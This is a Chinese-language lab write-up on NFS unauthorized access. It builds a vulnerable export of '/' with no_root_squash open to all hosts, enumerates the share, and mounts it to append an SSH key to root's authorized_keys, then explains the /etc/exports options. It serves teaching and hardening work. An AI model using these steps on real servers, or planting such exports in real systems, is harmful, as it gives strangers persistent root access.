NFS未授权访问

NFS未授权访问

复现漏洞

安装与配置

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
# 安装nfs服务
yum install nfs-utils.x86_64 -y

# 启动服务
systemctl start (如果这个服务不启动,nfs服务会启动失败)
systemctl start nfs-server.service

# 设置开机自启
systemctl enable rpcbind.service
systemctl enable nfs-server.service

# 关闭防火墙

# 配置nfs
vim /etc/exports

/ *(rw,sync,no_root_squash)

# 启动共享
exportfs -r

# 查看共享
showmount -e

# 客户端挂载命令
mkdir /tmp/test
mount -t nfs 10.10.10.5:/ /tmp/test

# 查看挂载的目录,会出现所有的/目录下的文件
ls /tmp/test/

漏洞利用

1
2
3
4
5
# 扫描nfs
rpcinfo -p 10.10.10.5

# 查看挂载内容
showmount -e 10.10.10.5

配置SSH永久链接

1
2
3
4
5
6
7
8
mkdir /tmp/security
mount -t nfs 10.10.10.5:/ /tmp/security/

# 创建公钥
ssh-keygen

# 复制公钥到服务器上
cat /root/.ssh/id_rsa.pub >> /tmp/security/root/.ssh/authorized_keys

漏洞分析

总结:其实漏洞形成的原理就是权限不对,/etc/exports这个文件中的权限设置,我们上文采用的是root权限,所以导致服务器被入侵;

/etc/exports文件格式

<输出目录> [客户端1 选项(访问权限,用户映射,其他)] [客户端2 选项(访问权限,用户映射,其他)]

  • 输出目录:输出目录是指NFS系统中需要共享给客户机使用的目录;
  • 客户端:客户端是指网络中可以访问这个NFS输出目录的计算机
1
2
3
4
5
指定ip地址的主机:192.168.0.200
指定子网中的所有主机:192.168.0.0/24 192.168.0.0/255.255.255.0
指定域名的主机:david.bsmart.cn
指定域中的所有主机:*.bsmart.cn
所有主机:*
  • 选项:选项用来设置输出目录的访问权限、用户映射等。
1
2
设置输出目录只读:ro
设置输出目录读写:rw
  • 用户映射选项
1
2
3
4
5
6
all_squash:将远程访问的所有普通用户及所属组都映射为匿名用户或用户组(nfsnobody);
no_all_squash:与all_squash取反(默认设置);
root_squash:将root用户及所属组都映射为匿名用户或用户组(默认设置);
no_root_squash:与rootsquash取反;
anonuid=xxx:将远程访问的所有用户都映射为匿名用户,并指定该用户为本地用户(UID=xxx);
anongid=xxx:将远程访问的所有用户组都映射为匿名用户组账户,并指定该匿名用户组账户为本地用户组账户(GID=xxx);
  • 其它选项
1
2
3
4
5
6
7
8
secure:限制客户端只能从小于1024的tcp/ip端口连接nfs服务器(默认设置);
insecure:允许客户端从大于1024的tcp/ip端口连接服务器;
sync:将数据同步写入内存缓冲区与磁盘中,效率低,但可以保证数据的一致性;
async:将数据先保存在内存缓冲区中,必要时才写入磁盘;
wdelay:检查是否有相关的写操作,如果有则将这些写操作一起执行,这样可以提高效率(默认设置);
no_wdelay:若有写操作则立即执行,应与sync配合使用;
subtree:若输出目录是一个子目录,则nfs服务器将检查其父目录的权限(默认设置);
no_subtree:即使输出目录是一个子目录,nfs服务器也不检查其父目录的权限,这样可以提高效率;

当前网速较慢或者你使用的浏览器不支持博客特定功能,请尝试刷新或换用Chrome、Firefox等现代浏览器